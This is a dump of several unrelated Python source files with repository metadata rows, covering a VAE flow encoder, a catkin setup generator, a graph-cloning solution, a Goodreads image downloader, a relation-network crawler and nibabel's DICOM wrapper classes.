        # One choice index per modification type, advanced like an odometer.
        indices = [0] * n
        while True:
            if n != 0:
                # Propagate carries from the rightmost digit; a carry out of
                # digit 0 means the enumeration is complete.
                for i in reversed(range(n)):
                    if indices[i] != len(ix_bound[i]):
                        break
                    indices[i] = 0
                    if i > 0:
                        indices[i - 1] += 1
                    else:
                        return seq_space
                ix_sites = [ix_bound[ss][indices[ss]] for ss in range(n)]
            else:
                ix_sites = []

            common_sites = set().union(*ix_sites)
            glyco_sites = set(self.candidate_sites).difference(common_sites)

            # A configuration is invalid when two modifications claim the same
            # residue, or too few free glycosylation sites remain.
            # BUG FIX: the original condition used ``a != b | c``; bitwise
            # ``|`` binds tighter than ``!=`` so the intended logical "or" was
            # actually folded into the right-hand side of the comparison.
            if (len(common_sites) != sum(map(len, ix_sites))
                    or num_sites > len(glyco_sites)):
                if n == 0:
                    # No modification indices to advance - nothing can become
                    # valid, so stop instead of looping (or raising) forever.
                    return seq_space
                # BUG FIX: advance the *last* digit, mirroring the increment
                # at the bottom of the loop; the original bumped ``indices[i]``
                # which skipped combinations whenever a carry had just occurred.
                indices[-1] += 1
                continue

            # Apply the chosen modification placements to a fresh copy.
            raw_seq = copy.deepcopy(self.seq)
            for x in range(n):
                for mod_site in ix_bound[x][indices[x]]:
                    raw_seq.addModification(mod_site, self.modifications[x].name)

            # One output sequence per way of occupying ``num_sites`` of the
            # remaining candidate sites with HexNAc.
            for sites in itertools.combinations(glyco_sites, num_sites):
                temp_seq = copy.deepcopy(raw_seq)
                for site in sites:
                    gly_mod = Modification("HexNAc", site, 1, Residue("HexNAc").mass, 'Asn')
                    temp_seq.appendModification(gly_mod)
                seq_space.append(temp_seq)

            if n == 0:
                return seq_space
            # Advance to the next modification placement.
            indices[-1] += 1
| [
"mobiusklein@gmail.com"
] | mobiusklein@gmail.com |
31e5ebee994f90436a19d50002aded516ef02700 | 2cb9eb8074c1e7d7a9ae06343b40ccfe178103eb | /modules/encoders/enc_flow.py | 21c3382d05234e3c930afdd44e008f4650a28928 | [
"MIT"
] | permissive | SmilesDZgk/DU-VAE | aea02cb023e0b285ff85803849ee6f9d44185b99 | 6c590922a5b634fadff814bd70d05065d584fa9f | refs/heads/master | 2023-05-14T09:53:39.399140 | 2021-06-09T03:38:49 | 2021-06-09T03:38:49 | 374,944,013 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,467 | py | from .flow import *
import torch
from torch import nn
import numpy as np
import math
from ..utils import log_sum_exp
class IAFEncoderBase(nn.Module):
    """Base class for encoders whose posterior is refined by an IAF flow.

    Subclasses implement ``forward`` and are expected to provide
    ``self.log_q_z_0`` (a Gaussian log-density module); ``encode`` uses it
    with default loc/scale as the prior term.
    """

    def __init__(self):
        super(IAFEncoderBase, self).__init__()

    def sample(self, input, nsamples):
        """sampling from the encoder
        Returns: Tensor1, Tensor2
            Tensor1: the tensor latent z with shape [batch, nsamples, nz]
            Tensor2: log q(z|x) of the sampled z (as produced by ``forward``)
        """
        z_T, log_q_z = self.forward(input, nsamples)
        return z_T, log_q_z

    def forward(self, x, n_sample):
        """
        Args:
            x: (batch_size, *)
        Returns: Tensor1, Tensor2
            Tensor1: sampled latent z, shape [batch, n_sample, nz]
            Tensor2: log q(z|x) for the sample
        """
        raise NotImplementedError

    def encode(self, input, args):
        """perform the encoding and compute the KL term
        Returns: Tensor1, Tensor2
            Tensor1: the tensor latent z with shape [batch, nsamples, nz]
            Tensor2: the tensor of KL for each x with shape [batch]
        """
        # (batch, nsamples, nz)
        z_T, log_q_z = self.forward(input, args.nsamples)
        # Monte-Carlo KL: log q(z|x) - log p(z), where p is the standard
        # normal (log_q_z_0 with default loc=0, scale=1).
        log_p_z = self.log_q_z_0(z=z_T)  # [b s nz]
        kl = log_q_z - log_p_z
        # free-bit
        if self.training and args.fb == 1 and args.target_kl > 0:
            # Clamp the per-dimension KL (averaged over batch and samples)
            # from below at target_kl, then broadcast back to full shape.
            kl_obj = torch.mean(kl, dim=[0, 1], keepdim=True)
            kl_obj = torch.clamp_min(kl_obj, args.target_kl)
            kl_obj = kl_obj.expand(kl.size(0), kl.size(1), -1)
            kl = kl_obj
        return z_T, kl.sum(dim=[1, 2])  # like KL

    def reparameterize(self, mu, logvar, nsamples=1):
        """sample from posterior Gaussian family
        Args:
            mu: Tensor
                Mean of gaussian distribution with shape (batch, nz)
            logvar: Tensor
                logvar of gaussian distibution with shape (batch, nz)
        Returns: Tensor
            Sampled z with shape (batch, nsamples, nz)
        """
        batch_size, nz = mu.size()
        std = logvar.mul(0.5).exp()
        mu_expd = mu.unsqueeze(1).expand(batch_size, nsamples, nz)
        std_expd = std.unsqueeze(1).expand(batch_size, nsamples, nz)
        eps = torch.zeros_like(std_expd).normal_()
        return mu_expd + torch.mul(eps, std_expd)

    def eval_inference_dist(self, x, z, param=None):
        """this function computes log q(z | x)
        Args:
            z: tensor
                different z points that will be evaluated, with
                shape [batch, nsamples, nz]
        Returns: Tensor1
            Tensor1: log q(z|x) with shape [batch, nsamples]
        """
        nz = z.size(2)
        if not param:
            # NOTE(review): ``self.forward(x)`` does not match the
            # ``forward(input, n_sample)`` signature above, and subclass
            # forwards return (z, log q) rather than (mu, logvar); this
            # branch probably should call ``infer_param`` - confirm.
            mu, logvar = self.forward(x)
        else:
            mu, logvar = param
        # (batch_size, 1, nz)
        mu, logvar = mu.unsqueeze(1), logvar.unsqueeze(1)
        var = logvar.exp()
        # (batch_size, nsamples, nz)
        dev = z - mu
        # (batch_size, nsamples): diagonal-Gaussian log density.
        log_density = -0.5 * ((dev ** 2) / var).sum(dim=-1) - \
            0.5 * (nz * math.log(2 * math.pi) + logvar.sum(-1))
        return log_density
class VariationalFlow(IAFEncoderBase):
    """Approximate posterior parameterized by a flow (https://arxiv.org/abs/1606.04934).

    An LSTM encodes the token sequence; a bias-free linear head produces the
    Gaussian base posterior (loc, scale) plus a context vector for a stack of
    inverse autoregressive flows that refine the sample.
    """

    def __init__(self, args, vocab_size, model_init, emb_init):
        super().__init__()
        self.ni = args.ni
        self.nh = args.enc_nh
        self.nz = args.nz
        self.args = args
        flow_depth = args.flow_depth
        flow_width = args.flow_width
        self.embed = nn.Embedding(vocab_size, args.ni)
        self.lstm = nn.LSTM(input_size=args.ni, hidden_size=args.enc_nh, num_layers=1,
                            batch_first=True, dropout=0)
        # 4*nz outputs: nz for loc, nz for the scale argument, 2*nz for the
        # flow context vector h (split apart in forward()).
        self.linear = nn.Linear(args.enc_nh, 4 * args.nz, bias=False)
        modules = []
        for _ in range(flow_depth):
            modules.append(InverseAutoregressiveFlow(num_input=args.nz,
                                                     num_hidden=flow_width * args.nz,  # hidden dim in MADE
                                                     num_context=2 * args.nz))
            modules.append(Reverse(args.nz))
        self.q_z_flow = FlowSequential(*modules)
        self.log_q_z_0 = NormalLogProb()
        self.softplus = nn.Softplus()
        self.reset_parameters(model_init, emb_init)
        # BN: batch-normalize the posterior mean, with the BN weight held at
        # RMS norm args.gamma (enabled when gamma > 0).
        self.BN = False
        if self.args.gamma > 0:
            self.BN = True
            self.mu_bn = nn.BatchNorm1d(args.nz, eps=1e-8)
            self.gamma = args.gamma
            nn.init.constant_(self.mu_bn.weight, self.args.gamma)
            nn.init.constant_(self.mu_bn.bias, 0.0)
        # DP: dropout on the posterior variance plus a small additive floor.
        self.DP = False
        if self.args.p_drop > 0 and self.args.delta_rate > 0:
            self.DP = True
            self.p_drop = self.args.p_drop
            self.delta_rate = self.args.delta_rate

    def reset_parameters(self, model_init, emb_init):
        """Init LSTM/linear weights with ``model_init`` (biases to 0), embeddings with ``emb_init``."""
        for name, param in self.lstm.named_parameters():
            if 'bias' in name:
                nn.init.constant_(param, 0.0)
            elif 'weight' in name:
                model_init(param)
        model_init(self.linear.weight)
        emb_init(self.embed.weight)

    def forward(self, input, n_samples):
        """Return sample of latent variable and log prob.

        Returns (z_T, log_q_z): the flow-transformed sample of shape
        [batch, n_samples, nz] and its per-dimension log density.
        """
        word_embed = self.embed(input)
        _, (last_state, last_cell) = self.lstm(word_embed)
        loc_scale, h = self.linear(last_state.squeeze(0)).chunk(2, -1)
        loc, scale_arg = loc_scale.chunk(2, -1)
        scale = self.softplus(scale_arg)
        if self.BN:
            # Renormalize the BN weight to RMS gamma before applying it.
            ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
            self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
            loc = self.mu_bn(loc)
        if self.DP and self.args.kl_weight >= self.args.drop_start:
            # Variance dropout with additive floor delta_rate / (2*e*pi).
            var = scale ** 2
            var = torch.dropout(var, p=self.p_drop, train=self.training)
            var += self.delta_rate * 1.0 / (2 * math.e * math.pi)
            scale = var ** 0.5
        loc = loc.unsqueeze(1)
        scale = scale.unsqueeze(1)
        h = h.unsqueeze(1)
        eps = torch.randn((loc.shape[0], n_samples, loc.shape[-1]), device=loc.device)
        z_0 = loc + scale * eps  # reparameterization
        log_q_z_0 = self.log_q_z_0(loc=loc, scale=scale, z=z_0)
        z_T, log_q_z_flow = self.q_z_flow(z_0, context=h)
        log_q_z = (log_q_z_0 + log_q_z_flow)  # [b s nz]
        if torch.sum(torch.isnan(z_T)):
            # Debug trap: only fires when the flow produced NaNs.
            import ipdb
            ipdb.set_trace()
        if torch.rand(1).sum() <= 0.0005:
            # NOTE(review): leftover debug hook; the attribute access is a
            # no-op, but torch.rand(1) advances the global RNG every call -
            # kept to preserve reproducibility with existing runs.
            if self.BN:
                self.mu_bn.weight
        return z_T, log_q_z

    def infer_param(self, input):
        """Return the base posterior parameters (loc, log-variance) for ``input``."""
        word_embed = self.embed(input)
        _, (last_state, last_cell) = self.lstm(word_embed)
        loc_scale, h = self.linear(last_state.squeeze(0)).chunk(2, -1)
        loc, scale_arg = loc_scale.chunk(2, -1)
        scale = self.softplus(scale_arg)
        if self.BN:
            # Here the rescale only happens when the weight RMS fell below
            # gamma (unlike forward(), which always rescales).
            ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
            if ss < self.gamma:
                self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
            loc = self.mu_bn(loc)
        if self.DP and self.args.kl_weight >= self.args.drop_start:
            var = scale ** 2
            var = torch.dropout(var, p=self.p_drop, train=self.training)
            var += self.delta_rate * 1.0 / (2 * math.e * math.pi)
            scale = var ** 0.5
        return loc, torch.log(scale ** 2)

    def learn_feature(self, input):
        """Encode ``input``; return (posterior mean, flow-transformed mean)."""
        word_embed = self.embed(input)
        _, (last_state, last_cell) = self.lstm(word_embed)
        loc_scale, h = self.linear(last_state.squeeze(0)).chunk(2, -1)
        loc, scale_arg = loc_scale.chunk(2, -1)
        # BUG FIX: removed an unconditional ``import ipdb; ipdb.set_trace()``
        # debugging leftover that halted every caller of this method.
        if self.BN:
            loc = self.mu_bn(loc)
        loc = loc.unsqueeze(1)
        h = h.unsqueeze(1)
        z_T, log_q_z_flow = self.q_z_flow(loc, context=h)
        return loc, z_T
from .enc_resnet_v2 import ResNet
class FlowResNetEncoderV2(IAFEncoderBase):
    """ResNet image encoder whose Gaussian posterior is refined by an IAF flow."""

    def __init__(self, args, ngpu=1):
        super(FlowResNetEncoderV2, self).__init__()
        self.ngpu = ngpu
        self.nz = args.nz
        self.nc = 1  # single-channel input images
        hidden_units = 512
        # Feature extractor: ResNet stack, then a 4x4 conv that collapses the
        # spatial grid into a 512-dim feature vector.
        self.main = nn.Sequential(
            ResNet(self.nc, [64, 64, 64], [2, 2, 2]),
            nn.Conv2d(64, hidden_units, 4, 1, 0, bias=False),
            nn.BatchNorm2d(hidden_units),
            nn.ELU(),
        )
        # 4*nz outputs: nz for loc, nz for the scale argument, 2*nz for the
        # flow context vector h (split apart in forward()).
        self.linear = nn.Linear(hidden_units, 4 * self.nz)
        self.reset_parameters()
        self.delta_rate = args.delta_rate
        self.args = args
        flow_depth = args.flow_depth
        flow_width = args.flow_width
        modules = []
        for _ in range(flow_depth):
            modules.append(InverseAutoregressiveFlow(num_input=args.nz,
                                                     num_hidden=flow_width * args.nz,  # hidden dim in MADE
                                                     num_context=2 * args.nz))
            modules.append(Reverse(args.nz))
        self.q_z_flow = FlowSequential(*modules)
        self.log_q_z_0 = NormalLogProb()
        self.softplus = nn.Softplus()
        # BN: batch-normalize the posterior mean, with the BN weight held at
        # RMS norm args.gamma (enabled when gamma > 0).
        self.BN = False
        if self.args.gamma > 0:
            self.BN = True
            self.mu_bn = nn.BatchNorm1d(args.nz, eps=1e-8)
            self.gamma = args.gamma
            nn.init.constant_(self.mu_bn.weight, self.args.gamma)
            nn.init.constant_(self.mu_bn.bias, 0.0)
        # DP: dropout on the posterior variance plus a small additive floor.
        self.DP = False
        if self.args.p_drop > 0 and self.args.delta_rate > 0:
            self.DP = True
            self.p_drop = self.args.p_drop
            self.delta_rate = self.args.delta_rate

    def reset_parameters(self):
        # He-style init for convolutions, unit/zero init for batch norms,
        # Xavier for the final linear head.
        for m in self.main.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
        nn.init.xavier_uniform_(self.linear.weight)
        nn.init.constant_(self.linear.bias, 0.0)

    def forward(self, input, n_samples):
        """Sample z of shape (batch, n_samples, nz) and its log q(z|x)."""
        if isinstance(input.data, torch.cuda.FloatTensor) and self.ngpu > 1:
            output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))
        else:
            output = self.main(input)
        output = self.linear(output.view(output.size()[:2]))
        loc_scale, h = output.chunk(2, -1)
        loc, scale_arg = loc_scale.chunk(2, -1)
        scale = self.softplus(scale_arg)
        if self.BN:
            # Renormalize the BN weight to RMS gamma before applying it.
            ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
            #if ss < self.gamma:
            self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
            loc = self.mu_bn(loc)
        if self.DP and self.args.kl_weight >= self.args.drop_start:
            # Variance dropout with additive floor delta_rate / (2*e*pi).
            var = scale ** 2
            var = torch.dropout(var, p=self.p_drop, train=self.training)
            var += self.delta_rate * 1.0 / (2 * math.e * math.pi)
            scale = var ** 0.5
        loc = loc.unsqueeze(1)
        scale = scale.unsqueeze(1)
        h = h.unsqueeze(1)
        eps = torch.randn((loc.shape[0], n_samples, loc.shape[-1]), device=loc.device)
        z_0 = loc + scale * eps  # reparameterization
        log_q_z_0 = self.log_q_z_0(loc=loc, scale=scale, z=z_0)
        z_T, log_q_z_flow = self.q_z_flow(z_0, context=h)
        log_q_z = (log_q_z_0 + log_q_z_flow)  # [b s nz]
        if torch.sum(torch.isnan(z_T)):
            # Debug trap: only fires when the flow produced NaNs.
            import ipdb
            ipdb.set_trace()
        if torch.rand(1).sum() <= 0.001:
            # NOTE(review): leftover debug hook; the attribute access is a
            # no-op, but torch.rand(1) advances the global RNG every call.
            if self.BN:
                self.mu_bn.weight
        return z_T, log_q_z

    def infer_param(self, input):
        """Return the base posterior parameters (loc, log-variance) for ``input``."""
        if isinstance(input.data, torch.cuda.FloatTensor) and self.ngpu > 1:
            output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))
        else:
            output = self.main(input)
        output = self.linear(output.view(output.size()[:2]))
        loc_scale, h = output.chunk(2, -1)
        loc, scale_arg = loc_scale.chunk(2, -1)
        scale = self.softplus(scale_arg)
        if self.BN:
            # Rescale only when the weight RMS fell below gamma (forward()
            # always rescales).
            ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
            if ss < self.gamma:
                self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
            loc = self.mu_bn(loc)
        if self.DP and self.args.kl_weight >= self.args.drop_start:
            var = scale ** 2
            var = torch.dropout(var, p=self.p_drop, train=self.training)
            var += self.delta_rate * 1.0 / (2 * math.e * math.pi)
            scale = var ** 0.5
        return loc, torch.log(scale ** 2)

    def learn_feature(self, input):
        """Encode ``input``; return (posterior mean, flow-transformed mean)."""
        if isinstance(input.data, torch.cuda.FloatTensor) and self.ngpu > 1:
            output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))
        else:
            output = self.main(input)
        output = self.linear(output.view(output.size()[:2]))
        loc_scale, h = output.chunk(2, -1)
        loc, _ = loc_scale.chunk(2, -1)
        if self.BN:
            ss = torch.mean(self.mu_bn.weight.data ** 2) ** 0.5
            if ss < self.gamma:
                self.mu_bn.weight.data = self.mu_bn.weight.data * self.gamma / ss
            loc = self.mu_bn(loc)
        loc = loc.unsqueeze(1)
        h = h.unsqueeze(1)
        z_T, log_q_z_flow = self.q_z_flow(loc, context=h)
        return loc, z_T
class NormalLogProb(nn.Module):
    """Elementwise log-density of a diagonal Gaussian N(loc, scale**2)."""

    def __init__(self):
        super().__init__()

    def forward(self, z, loc=None, scale=None):
        """Return log N(z; loc, scale**2) elementwise; defaults to the standard normal."""
        if loc is None:
            loc = torch.zeros_like(z, device=z.device)
        if scale is None:
            scale = torch.ones_like(z, device=z.device)
        variance = scale ** 2
        log_norm_const = -0.5 * torch.log(2 * np.pi * variance)
        return log_norm_const - (z - loc) ** 2 / (2 * variance)
| [
"sdz@mail.ustc.edu.cn"
] | sdz@mail.ustc.edu.cn |
a96327133682df32421991e8d10431e67cf5d8ba | 67c69f80aca0306b52ef261dab846cd9466e3bdc | /ros_backup/build/catkin_generated/generate_cached_setup.py | 840864541e4626d3f7f53e8b8e5035def94fa65b | [
"MIT"
] | permissive | zhenguo77555344/Final-System-Integrated | 29842508e4e72bc4e190b584c535c9c49baaea6d | 4ebb96d9d6ac4be751c93ada8a1b3358b4327a66 | refs/heads/master | 2022-11-28T14:41:40.504183 | 2019-10-08T14:30:47 | 2019-10-08T14:30:47 | 203,168,176 | 0 | 2 | MIT | 2022-11-22T00:23:14 | 2019-08-19T12:27:45 | Makefile | UTF-8 | Python | false | false | 1,332 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# NOTE(review): this file lives under build/catkin_generated/ and appears to
# be auto-generated by catkin - edits may be overwritten by the build.
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/kinetic/share/catkin/cmake', 'catkinConfig.cmake.in')):
    sys.path.insert(0, os.path.join('/opt/ros/kinetic/share/catkin/cmake', '..', 'python'))
try:
    from catkin.environment_cache import generate_environment_script
except ImportError:
    # search for catkin package in all workspaces and prepend to path
    for workspace in "/opt/ros/kinetic".split(';'):
        python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
        if os.path.isdir(os.path.join(python_path, 'catkin')):
            sys.path.insert(0, python_path)
            break
    from catkin.environment_cache import generate_environment_script
# Render this workspace's env.sh into a cached shell setup script.
code = generate_environment_script('/home/student/Documents/Final-System-Integrated/ros/devel/env.sh')
output_filename = '/home/student/Documents/Final-System-Integrated/ros/build/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
    #print('Generate script for cached setup "%s"' % output_filename)
    f.write('\n'.join(code))
# Mark the generated script as executable for the owner.
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"pricss@126.com"
] | pricss@126.com |
63198985bafcfb41ecc400d469fc3f150a976001 | 849098b8e3df53d9c93e876a51ba2e21ad4a44f3 | /133_clone_graph.py | 8ff57f2cf898727e4914a9cd094a99c7786db543 | [] | no_license | Elsa1024/leetcode_java | ee4816a6ad5f9ac656d138cb576ffcc9e7c30184 | d2bb7f25093a4b0c483bc21fe86abc19109e9198 | refs/heads/master | 2020-03-08T04:49:43.367068 | 2018-10-27T18:06:21 | 2018-10-27T18:06:21 | 127,932,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | # Definition for a undirected graph node
# class UndirectedGraphNode:
# def __init__(self, x):
# self.label = x
# self.neighbors = []
class Solution:
    # @param node, a undirected graph node
    # @return a undirected graph node
    def cloneGraph(self, node):
        """Deep-copy an undirected graph via breadth-first traversal."""
        if not node:
            return None
        # Map each original node to its clone so shared neighbors are reused.
        root_clone = UndirectedGraphNode(node.label)
        clones = {node: root_clone}
        pending = collections.deque([node])
        while pending:
            current = pending.popleft()
            for neighbor in current.neighbors:
                if neighbor in clones:
                    clones[current].neighbors.append(clones[neighbor])
                else:
                    fresh = UndirectedGraphNode(neighbor.label)
                    clones[neighbor] = fresh
                    clones[current].neighbors.append(fresh)
                    pending.append(neighbor)
        return root_clone
| [
"daichenwei.elsa@gmail.com"
] | daichenwei.elsa@gmail.com |
aa531698ea829e073948d5c654cd6ff720fe9157 | 4f3b1bd644704057a3aa0352f55ef91df4eef811 | /Data Collection/Goodreads image collector.py | 1e00f76ec06cf6bb8a6b9aa29c796914d075d6a5 | [] | no_license | JieyuZhang97/Goodreads-book-analysis | 4f97f069c92fe70a4df4443f84bd216550fdc256 | a3c08670cd862f33d63d820fa1c0cabba8fce7dc | refs/heads/master | 2023-03-26T08:52:38.538447 | 2021-03-29T15:59:34 | 2021-03-29T15:59:34 | 346,068,399 | 0 | 0 | null | 2021-03-29T15:59:35 | 2021-03-09T16:19:05 | null | UTF-8 | Python | false | false | 449 | py | import pandas as pd
import wget
import os
# Download the cover image for every book row in book_data.csv, naming each
# file after its row index.
book_data=pd.read_csv('book_data.csv')
PATH='C:\\Python\\Python37-32\\Scripts\\code\\images\\'
files=os.listdir(PATH)
n=0
# Resume support: continue after the highest-numbered image already on disk.
if len(files)>0:
    n=max([int(f[:-4]) for f in os.listdir(PATH)])+1
for i in range(n, len(book_data)):
    url=book_data.at[i, 'image_url']
    filename=f'{i}.jpg'
    # Rows with a missing image_url are skipped (no file written for them).
    if not pd.isna(url):
        wget.download(url, PATH+filename)
    # Progress marker every 100 rows.
    if i%100==0:
        print(i)
"noreply@github.com"
] | JieyuZhang97.noreply@github.com |
9d2526cae7bd917776f5296b7f9d34911fff966f | b56ecb98160317ac8fc17d41b033432bf2c85155 | /Source/Pre-processing/data_analysis.py | 8ac61178eb1638df814e32afeb14060b9fd2a321 | [] | no_license | harika2050/Samsung | 19c2a52482a852a06181448b2121dfc73e384ba2 | aa798078684dcee2009f95504ad3a7f65fb31447 | refs/heads/master | 2020-07-26T20:57:23.079598 | 2019-10-23T06:09:02 | 2019-10-23T06:09:02 | 208,763,862 | 0 | 0 | null | 2019-09-16T09:41:53 | 2019-09-16T09:41:53 | null | UTF-8 | Python | false | false | 187 | py | import collections
import re
import sys
import time
from collections import Counter
from nltk import ngrams
# NOTE(review): `bigtxt` is never defined in this script - it presumably
# holds the corpus text and must be assigned before this line runs (confirm).
ngram_counts = Counter(ngrams(bigtxt.split(), 2))
# Ten most frequent bigrams (the result is discarded when run as a script).
ngram_counts.most_common(10)
"root@instance-1.asia-south1-b.c.swift-icon-249114.internal"
] | root@instance-1.asia-south1-b.c.swift-icon-249114.internal |
21eb5886424c9971925aa7c5d3ea745ac1508863 | 3b6c20ca891807eb5533552837cf0614d878d284 | /code/buildnet/predict.py | 35aed0cad04d5ed3246514626b2fa8dd30bccd02 | [] | no_license | stupidjoey/baidu_bigdata | 99d296f833c9dcb9da414efeb4053e8fdd391e6a | 80504e16a226f74f8fd7e849fd8b58f412900a35 | refs/heads/master | 2021-01-10T03:30:14.178984 | 2015-08-10T10:34:34 | 2015-08-10T10:34:34 | 36,113,209 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,935 | py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import os
import re
import pickle
def main():
    # Python 2 script: breadth-first walk (up to 3 layers) of a pickled
    # relation network, dumping "relation<TAB>entity1<TAB>entity2" lines for
    # one seed entity into data/predict.<pinyin>.
    starttime = datetime.datetime.now()
    path = os.path.abspath('.')
    path = path.split('/')
    basepath = "/".join(path[:-2])
    netfile = open( os.path.join(basepath,'data/relation_net.pkl'))
    relation_net = pickle.load(netfile)
    netfile.close()
    # Seed entity: hanzi form for graph lookups, pinyin for the output name.
    target_ent_hanyu = u'林正英'
    target_ent_pinyin = 'linzhengying'
    predictpath = os.path.join(basepath,'data/predict.%s' % target_ent_pinyin )
    with open(predictpath,'w') as f:
        ent_set = set()  # entities already visited, to avoid cycles/duplicates
        layer = 1
        # Per-layer cap on how many neighbours to expand for each entity.
        layer_max_count = [10,3,2]
        # layer_max_count = [15,6,4]
        target_ent_list = [target_ent_hanyu]
        while layer <= 3 and len(target_ent_list) != 0:
            new_target_ent_list = []
            for target_ent in target_ent_list:
                ent_set.add(target_ent)
                entity2_set = relation_net[target_ent].keys()
                layercount = min(len(entity2_set), layer_max_count[layer-1])
                tempcount = 1
                for entity2 in entity2_set:
                    if entity2 in ent_set:
                        continue
                    relation = relation_net[target_ent][entity2]
                    # Python 2: encode unicode to UTF-8 bytes before writing.
                    writeline = '%s\t%s\t%s\n' % (relation.encode('utf-8'),target_ent.encode('utf-8'),entity2.encode('utf-8'))
                    f.write(writeline)
                    print writeline
                    new_target_ent_list.append(entity2)
                    ent_set.add(entity2)
                    tempcount += 1
                    if tempcount > layercount:
                        break
            target_ent_list = new_target_ent_list[:]
            layer += 1
    print 'finished ...'
    endtime = datetime.datetime.now()
    print 'elapsed time is %f' %(endtime - starttime).seconds


if __name__=='__main__':
    main()
"stupidzy1991@gmail.com"
] | stupidzy1991@gmail.com |
f5fc8e92c120225f2d0fffe4c1995837f5ae5838 | 0a3b930df060f54ae260508a1cb09e68a4e01020 | /nibabel/nicom/dicomwrappers.py | 883541b09cbd8ea85be291b8670b84b767fdbcc3 | [] | no_license | llcmgh/slicer_tract_querier | bc8b49bea2c64fa578d18dcaaed5d0e1cfd0d4ff | 41c96fb079eb9e046ac3efa45f82ac2dce7dcc5d | refs/heads/master | 2016-09-09T17:23:53.620717 | 2014-01-24T00:52:16 | 2014-01-24T00:52:16 | 14,962,648 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 31,391 | py | """ Classes to wrap DICOM objects and files
The wrappers encapsulate the capabilities of the different DICOM
formats.
They also allow dictionary-like access to named fields.
For calculated attributes, we return None where needed data is missing.
It seemed strange to raise an error during attribute processing, other
than an AttributeError - breaking the 'properties manifesto'. So, any
processing that needs to raise an error, should be in a method, rather
than in a property, or property-like thing.
"""
import operator
import numpy as np
from . import csareader as csar
from .dwiparams import B2q, nearest_pos_semi_def, q2bg
from ..volumeutils import BinOpener
from ..onetime import setattr_on_read as one_time
class WrapperError(Exception):
    """Base error for DICOM wrapper processing."""
    pass
class WrapperPrecisionError(WrapperError):
    """Raised when a derived quantity fails its numerical-precision check."""
    pass
def wrapper_from_file(file_like, *args, **kwargs):
    """ Create DICOM wrapper from `file_like` object

    Parameters
    ----------
    file_like : object
        filename string or file-like object pointing at a DICOM file that
        ``pydicom`` can read
    \*args : positional
        extra positional args handed to ``dicom.read_file``.
    \*\*kwargs : keyword
        extra keyword args handed to ``dicom.read_file``; ``force=True`` is
        a likely candidate.

    Returns
    -------
    dcm_w : ``dicomwrappers.Wrapper`` or subclass
        DICOM wrapper matching the detected DICOM data type
    """
    import dicom
    # BinOpener accepts either a filename or an already-open file object and
    # ensures the handle is closed when the block exits.
    with BinOpener(file_like) as stream:
        dataset = dicom.read_file(stream, *args, **kwargs)
    # Delegate the choice of wrapper class to wrapper_from_data.
    return wrapper_from_data(dataset)
def wrapper_from_data(dcm_data):
    """ Create DICOM wrapper from DICOM data object

    Parameters
    ----------
    dcm_data : ``dicom.dataset.Dataset`` instance or similar
        Object allowing attribute access, with DICOM attributes.
        Probably a dataset as read by ``pydicom``.

    Returns
    -------
    dcm_w : ``dicomwrappers.Wrapper`` or subclass
        DICOM wrapper corresponding to DICOM data type
    """
    # Enhanced MR Image Storage SOP class; currently only Philips writes
    # Enhanced Multiframe DICOM.
    if dcm_data.get('SOPClassUID') == '1.2.840.10008.5.1.4.1.1.4.1':
        return MultiframeWrapper(dcm_data)
    # Only Siemens files carry a CSA header; anything without one gets the
    # generic wrapper.
    csa_hdr = csar.get_csa_header(dcm_data)
    if csa_hdr is None:
        return Wrapper(dcm_data)
    if csar.is_mosaic(csa_hdr):
        # Mosaic files tile many slices into a single 2D image.
        return MosaicWrapper(dcm_data, csa_hdr)
    # Otherwise assume one slice per file, Siemens flavor.
    return SiemensWrapper(dcm_data, csa_hdr)
class Wrapper(object):
""" Class to wrap general DICOM files
Methods:
* get_affine()
* get_data()
* get_pixel_array()
* is_same_series(other)
* __getitem__ : return attributes from `dcm_data`
* get(key[, default]) - as usual given __getitem__ above
Attributes and things that look like attributes:
* dcm_data : object
* image_shape : tuple
* image_orient_patient : (3,2) array
* slice_normal : (3,) array
* rotation_matrix : (3,3) array
* voxel_sizes : tuple length 3
* image_position : sequence length 3
* slice_indicator : float
* series_signature : tuple
"""
is_csa = False
is_mosaic = False
is_multiframe = False
b_matrix = None
q_vector = None
b_value = None
b_vector = None
    def __init__(self, dcm_data):
        """ Initialize wrapper

        Parameters
        ----------
        dcm_data : object
            object should allow 'get' and '__getitem__' access.  Usually this
            will be a ``dicom.dataset.Dataset`` object resulting from reading a
            DICOM file, but a dictionary should also work.
        """
        # Stored as-is; the calculated properties below read fields lazily
        # through ``self.get(...)``.
        self.dcm_data = dcm_data
@one_time
def image_shape(self):
""" The array shape as it will be returned by ``get_data()``
"""
shape = (self.get('Rows'), self.get('Columns'))
if None in shape:
return None
return shape
@one_time
def image_orient_patient(self):
""" Note that this is _not_ LR flipped """
iop = self.get('ImageOrientationPatient')
if iop is None:
return None
# Values are python Decimals in pydicom 0.9.7
iop = np.array(list(map(float, iop)))
return np.array(iop).reshape(2, 3).T
@one_time
def slice_normal(self):
iop = self.image_orient_patient
if iop is None:
return None
# iop[:, 0] is column index cosine, iop[:, 1] is row index cosine
